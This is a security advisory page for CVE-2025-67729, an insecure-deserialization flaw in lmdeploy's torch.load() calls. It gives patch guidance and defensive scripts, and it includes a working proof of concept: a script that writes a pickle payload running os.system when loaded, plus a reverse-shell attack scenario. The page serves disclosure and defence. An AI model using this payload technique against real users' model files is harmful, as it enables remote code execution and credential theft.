CVE-2025-67729: lmdeploy: Deserialization enables RCE

GHSA-9pf3-7rrr-x5jh HIGH CISA: ATTEND
Published December 26, 2025
CISO Take

Patch lmdeploy to 0.11.1 immediately if your teams use it for model serving or inference. This is a classic pickle deserialization RCE that requires only loading a malicious .bin or .pt model file — a trivially realistic attack given how freely ML teams download models from HuggingFace and ModelScope. Until patched, enforce a policy requiring SafeTensors format (.safetensors) for all model loading in production pipelines.

Risk Assessment

Effective risk is HIGH despite low EPSS (0.00069). The CVSS 8.8 score accurately reflects the impact potential: full RCE with no privileges required on the attacker side, only user interaction (victim loads a file). The attack concept is well-understood and PoC creation is trivial for anyone with Python knowledge. The exposure surface is broad in AI-heavy organizations where engineers routinely pull models from public registries without formal security review. The low EPSS reflects current lack of observed exploitation, not low exploitability.

Affected Systems

Package: lmdeploy
Ecosystem: pip
Vulnerable Range: <= 0.11
Patched: 0.11.1

If you run lmdeploy at any version up to and including 0.11, you are affected.
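A quick way to triage exposure is to compare the installed lmdeploy version against the first patched release, 0.11.1. This is an illustrative stdlib-only sketch (the `parse_version` helper is ours, not lmdeploy's, and it ignores pre-release suffixes); in practice your SBOM or dependency-scanning tooling does the same comparison.

```python
from importlib import metadata

PATCHED = (0, 11, 1)  # first fixed release per the advisory

def parse_version(v: str) -> tuple:
    """Keep only the leading numeric dot-separated part: '0.11.1rc0' -> (0, 11, 1)."""
    parts = []
    for piece in v.split("."):
        digits = ""
        for ch in piece:
            if ch.isdigit():
                digits += ch
            else:
                break
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)

def is_vulnerable(version: str) -> bool:
    """True for any version at or below 0.11 (tuple comparison)."""
    return parse_version(version) < PATCHED

def check_installed() -> str:
    try:
        v = metadata.version("lmdeploy")
    except metadata.PackageNotFoundError:
        return "lmdeploy is not installed"
    status = "VULNERABLE - upgrade to 0.11.1" if is_vulnerable(v) else "patched"
    return f"lmdeploy {v}: {status}"

if __name__ == "__main__":
    print(check_installed())
```

Run it once per environment; anything reporting a version below 0.11.1 should be patched or switched to SafeTensors-only loading.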

Severity & Risk

CVSS 3.1: 8.8 / 10
EPSS: 0.1% chance of exploitation in 30 days (higher than 29% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: Medium
Sophistication: Trivial
Exploitation Confidence: Medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV: Network
AC: Low
PR: None
UI: Required
S: Unchanged
C: High
I: High
A: High

Recommended Action (6 steps)
  1. PATCH

    Upgrade lmdeploy to 0.11.1 (contains the fix applying weights_only=True consistently).

  2. IMMEDIATE WORKAROUND

    Mandate SafeTensors (.safetensors) format for all model files — the codebase already handles this safely.

  3. POLICY

    Prohibit loading .bin or .pt model files from untrusted sources; implement model provenance verification (hash + source allowlist).

  4. SCANNING

    Deploy tools like ModelScan (HuggingFace) or ProtectAI's model scanner to detect pickle payloads in checkpoint files before loading.

  5. DETECTION

    Monitor for unexpected process spawns, outbound connections, or file writes during model loading operations.

  6. ENVIRONMENT

    Run model loading in sandboxed environments (containers with no network, minimal privileges) as defense-in-depth.
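Steps 2 and 3 can be enforced with a small pre-load gate that refuses anything but SafeTensors files and, optionally, checks a provenance allowlist of file hashes. This is an illustrative sketch under our own naming (`vet_model_file`, `APPROVED_SHA256` are hypothetical, not lmdeploy APIs); in a real pipeline the allowlist would come from your model registry and the file would then be loaded with the safetensors library.

```python
import hashlib

# Hypothetical allowlist of SHA-256 digests for approved model files.
# Populate from your model registry; empty means "skip the hash check".
APPROVED_SHA256 = set()

def sha256_of(path: str) -> str:
    """Stream the file in 1 MiB chunks so large checkpoints don't exhaust RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def vet_model_file(path: str) -> None:
    """Raise ValueError if the file violates policy; callers then load with safetensors."""
    if not path.endswith(".safetensors"):
        raise ValueError(f"policy: refusing non-SafeTensors file {path!r}")
    if APPROVED_SHA256 and sha256_of(path) not in APPROVED_SHA256:
        raise ValueError(f"policy: {path!r} not in provenance allowlist")
```

Calling `vet_model_file` before every load turns "mandate SafeTensors" from a written policy into an enforced one: `.bin` and `.pt` files fail fast instead of reaching a deserializer.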

CISA SSVC Assessment

Decision: Attend
Exploitation: PoC
Automatable: No
Technical Impact: Total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Article 9 - Risk Management System; Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001: A.6.1 - Policies for responsible development and use of AI systems; A.6.2 - AI System Supply Chain Management; A.8.2 - Data for Development and Enhancement of AI Systems
NIST AI RMF: GOVERN 6.2 - Organizational risk policies for AI supply chains; MANAGE 2.2 - Mechanisms to sustain AI risk management
OWASP LLM Top 10: LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-67729?

CVE-2025-67729 is an insecure deserialization vulnerability (CWE-502) in lmdeploy: `torch.load()` is called without `weights_only=True` when loading model checkpoint files, so loading a malicious `.bin` or `.pt` file executes arbitrary code with the victim's privileges. It carries a CVSS 3.1 base score of 8.8 (HIGH) and is fixed in lmdeploy 0.11.1. Until patched, enforce a policy requiring SafeTensors format (.safetensors) for all model loading in production pipelines.

Is CVE-2025-67729 actively exploited?

No active exploitation of CVE-2025-67729 has been confirmed, but a public proof of concept exists and the attack is trivial to reproduce, so organizations should patch proactively.

How to fix CVE-2025-67729?

1. PATCH: Upgrade lmdeploy to 0.11.1 (contains the fix applying weights_only=True consistently).
2. IMMEDIATE WORKAROUND: Mandate SafeTensors (.safetensors) format for all model files — the codebase already handles this safely.
3. POLICY: Prohibit loading .bin or .pt model files from untrusted sources; implement model provenance verification (hash + source allowlist).
4. SCANNING: Deploy tools like ModelScan (HuggingFace) or ProtectAI's model scanner to detect pickle payloads in checkpoint files before loading.
5. DETECTION: Monitor for unexpected process spawns, outbound connections, or file writes during model loading operations.
6. ENVIRONMENT: Run model loading in sandboxed environments (containers with no network, minimal privileges) as defense-in-depth.

What systems are affected by CVE-2025-67729?

Any deployment of lmdeploy at version 0.11 or earlier is affected. In architectural terms, the vulnerability touches model serving, inference pipelines, training pipelines, MLOps / model evaluation workflows, and quantization pipelines.

What is the CVSS score for CVE-2025-67729?

CVE-2025-67729 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.11%.

Technical Details

NVD Description

## Summary

An insecure deserialization vulnerability exists in lmdeploy where `torch.load()` is called without the `weights_only=True` parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim's machine when they load a malicious `.bin` or `.pt` model file.

**CWE:** CWE-502 - Deserialization of Untrusted Data

---

## Details

Several locations in lmdeploy use `torch.load()` without the recommended `weights_only=True` security parameter. PyTorch's `torch.load()` uses Python's pickle module internally, which can execute arbitrary code during deserialization.

### Vulnerable Locations

**1. `lmdeploy/vl/model/utils.py` (Line 22)**

```python
def load_weight_ckpt(ckpt: str) -> Dict[str, torch.Tensor]:
    """Load checkpoint."""
    if ckpt.endswith('.safetensors'):
        return load_file(ckpt)   # Safe - uses safetensors
    else:
        return torch.load(ckpt)  # ← VULNERABLE: no weights_only=True
```

**2. `lmdeploy/turbomind/deploy/loader.py` (Line 122)**

```python
class PytorchLoader(BaseLoader):
    def items(self):
        params = defaultdict(dict)
        for shard in self.shards:
            misc = {}
            tmp = torch.load(shard, map_location='cpu')  # ← VULNERABLE
```

**Additional vulnerable locations:**

- `lmdeploy/lite/apis/kv_qparams.py:129-130`
- `lmdeploy/lite/apis/smooth_quant.py:61`
- `lmdeploy/lite/apis/auto_awq.py:101`
- `lmdeploy/lite/apis/get_small_sharded_hf.py:41`

### Note: Secure Pattern Already Exists

The codebase already uses the secure pattern in one location:

```python
# lmdeploy/pytorch/weight_loader/model_weight_loader.py:103
state = torch.load(file, weights_only=True, map_location='cpu')  # ✓ Secure
```

This shows the fix is already known and can be applied consistently across the codebase.

---

## PoC

### Step 1: Create a Malicious Checkpoint File

Save this as `create_malicious_checkpoint.py`:

```python
#!/usr/bin/env python3
"""Creates a malicious PyTorch checkpoint that executes code when loaded."""
import pickle
import os


class MaliciousPayload:
    """Executes arbitrary code during pickle deserialization."""

    def __init__(self, command):
        self.command = command

    def __reduce__(self):
        # This is called during unpickling - returns (callable, args)
        return (os.system, (self.command,))


def create_malicious_checkpoint(output_path, command):
    """Create a malicious checkpoint file."""
    malicious_state_dict = {
        'model.layer.weight': MaliciousPayload(command),
        'config': {'hidden_size': 768}
    }
    with open(output_path, 'wb') as f:
        pickle.dump(malicious_state_dict, f)
    print(f"[+] Created malicious checkpoint: {output_path}")


if __name__ == "__main__":
    os.makedirs("malicious_model", exist_ok=True)
    create_malicious_checkpoint(
        "malicious_model/pytorch_model.bin",
        "echo '[PoC] Arbitrary code executed! - RCE confirmed'"
    )
```

### Step 2: Load the Malicious File (Simulates lmdeploy's Behavior)

Save this as `exploit.py`:

```python
#!/usr/bin/env python3
"""Demonstrates the vulnerability by loading the malicious checkpoint.

This simulates what happens when lmdeploy loads an untrusted model.
"""
import pickle


def unsafe_load(path):
    """Simulates torch.load() without weights_only=True."""
    # torch.load() uses pickle internally, so this is equivalent
    with open(path, 'rb') as f:
        return pickle.load(f)


if __name__ == "__main__":
    print("[*] Loading malicious checkpoint...")
    print("[*] This simulates: torch.load(ckpt) in lmdeploy")
    print("-" * 50)
    result = unsafe_load("malicious_model/pytorch_model.bin")
    print("-" * 50)
    print(f"[!] Checkpoint loaded. Keys: {list(result.keys())}")
    print("[!] If you see the PoC message above, RCE is confirmed!")
```

### Step 3: Run the PoC

```bash
# Create the malicious checkpoint
python create_malicious_checkpoint.py

# Exploit - triggers code execution
python exploit.py
```

### Expected Output

```
[+] Created malicious checkpoint: malicious_model/pytorch_model.bin
[*] Loading malicious checkpoint...
[*] This simulates: torch.load(ckpt) in lmdeploy
--------------------------------------------------
[PoC] Arbitrary code executed! - RCE confirmed   ← Code executed here!
--------------------------------------------------
[!] Checkpoint loaded. Keys: ['model.layer.weight', 'config']
[!] If you see the PoC message above, RCE is confirmed!
```

The `[PoC] Arbitrary code executed!` message proves that arbitrary shell commands run during deserialization.

---

## Impact

### Who Is Affected?

- **All users** who load PyTorch model files (`.bin`, `.pt`) from untrusted sources
- This includes models downloaded from HuggingFace, ModelScope, or shared by third parties

### Attack Scenario

1. Attacker creates a malicious model file (e.g., `pytorch_model.bin`) containing a pickle payload
2. Attacker distributes it as a "fine-tuned model" on model sharing platforms or directly to victims
3. Victim downloads and loads the model using lmdeploy
4. Malicious code executes with the victim's privileges

### Potential Consequences

- **Remote Code Execution (RCE)** - Full system compromise
- **Data theft** - Access to sensitive files, credentials, API keys
- **Lateral movement** - Pivot to other systems in cloud environments
- **Cryptomining or ransomware** - Malware deployment

---

## Recommended Fix

Add `weights_only=True` to all `torch.load()` calls:

```diff
# lmdeploy/vl/model/utils.py:22
- return torch.load(ckpt)
+ return torch.load(ckpt, weights_only=True)

# lmdeploy/turbomind/deploy/loader.py:122
- tmp = torch.load(shard, map_location='cpu')
+ tmp = torch.load(shard, map_location='cpu', weights_only=True)

# Apply the same pattern to:
# - lmdeploy/lite/apis/kv_qparams.py:129-130
# - lmdeploy/lite/apis/smooth_quant.py:61
# - lmdeploy/lite/apis/auto_awq.py:101
# - lmdeploy/lite/apis/get_small_sharded_hf.py:41
```

Alternatively, consider migrating fully to SafeTensors format, which is already supported in the codebase and immune to this vulnerability class.

---

## Resources

### Official PyTorch Security Documentation

- **[PyTorch torch.load() Documentation](https://pytorch.org/docs/stable/generated/torch.load.html)**

> *"torch.load() uses pickle module implicitly, which is known to be insecure. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never load data that could have come from an untrusted source."*

### Related CVEs

| CVE | Description | CVSS |
|-----|-------------|------|
| [CVE-2025-32434](https://nvd.nist.gov/vuln/detail/CVE-2025-32434) | PyTorch `torch.load()` RCE vulnerability | **9.3 Critical** |
| [CVE-2024-5452](https://nvd.nist.gov/vuln/detail/CVE-2024-5452) | PyTorch Lightning insecure deserialization | **8.8 High** |

### Additional Resources

- [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)
- [Trail of Bits: Exploiting ML Pickle Files](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)
- [Rapid7: Attackers Weaponizing AI Models](https://www.rapid7.com/blog/post/2024/02/06/attackers-are-weaponizing-ai-model-files/)
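The fix works because `weights_only=True` restricts which globals the pickle stream may resolve. The following stdlib-only sketch illustrates that idea (it is not PyTorch's actual implementation, and unlike PyTorch's allowlist of tensor classes it simply refuses every global, which is enough to stop `os.system` payloads):

```python
import io
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    """Reject every global lookup, mimicking the spirit of weights_only=True."""

    def find_class(self, module, name):
        # Any attempt to resolve a callable (os.system, builtins.eval, ...)
        # aborts deserialization instead of executing it.
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def restricted_loads(data: bytes):
    """Deserialize plain containers (dicts, lists, numbers, strings) only."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    import os

    class Payload:
        def __reduce__(self):
            return (os.system, ("echo pwned",))

    blob = pickle.dumps({"weight": Payload()})
    try:
        restricted_loads(blob)
    except pickle.UnpicklingError as e:
        print(f"payload rejected: {e}")  # the shell command never runs
```

Plain tensors-as-containers survive this gate because dicts, lists, and scalars use dedicated pickle opcodes that never call `find_class`; only payloads smuggling callables are stopped.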

Exploitation Scenario

An adversary creates a malicious 'fine-tuned LLaMA' model by embedding a pickle payload inside a pytorch_model.bin file that executes a reverse shell on deserialization. They publish it to HuggingFace under a convincing namespace (e.g., 'organization-llama3-finetuned-v2'). A data scientist on the target team finds the model via search, pulls it, and loads it with lmdeploy for evaluation. The moment torch.load() is called, the payload executes with the scientist's privileges — in cloud environments this often means access to IAM credentials, S3 buckets, and internal APIs. The attacker now has a foothold in the organization's ML infrastructure.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
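For readers scripting triage, the vector string decomposes mechanically into metric/value pairs. A minimal parser sketch (it splits the string only; it does not implement the CVSS scoring formulas):

```python
def parse_cvss_vector(vector: str) -> dict:
    """Split a CVSS v3.x vector string into a metric -> value mapping."""
    prefix, _, metrics = vector.partition("/")
    if not prefix.startswith("CVSS:"):
        raise ValueError(f"not a CVSS vector: {vector!r}")
    return dict(m.split(":", 1) for m in metrics.split("/"))


if __name__ == "__main__":
    v = parse_cvss_vector("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H")
    print(v["AV"], v["UI"])  # -> N R (network attack vector, user interaction required)
```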

Timeline

Published
December 26, 2025
Last Modified
December 27, 2025
First Seen
March 24, 2026

Related Vulnerabilities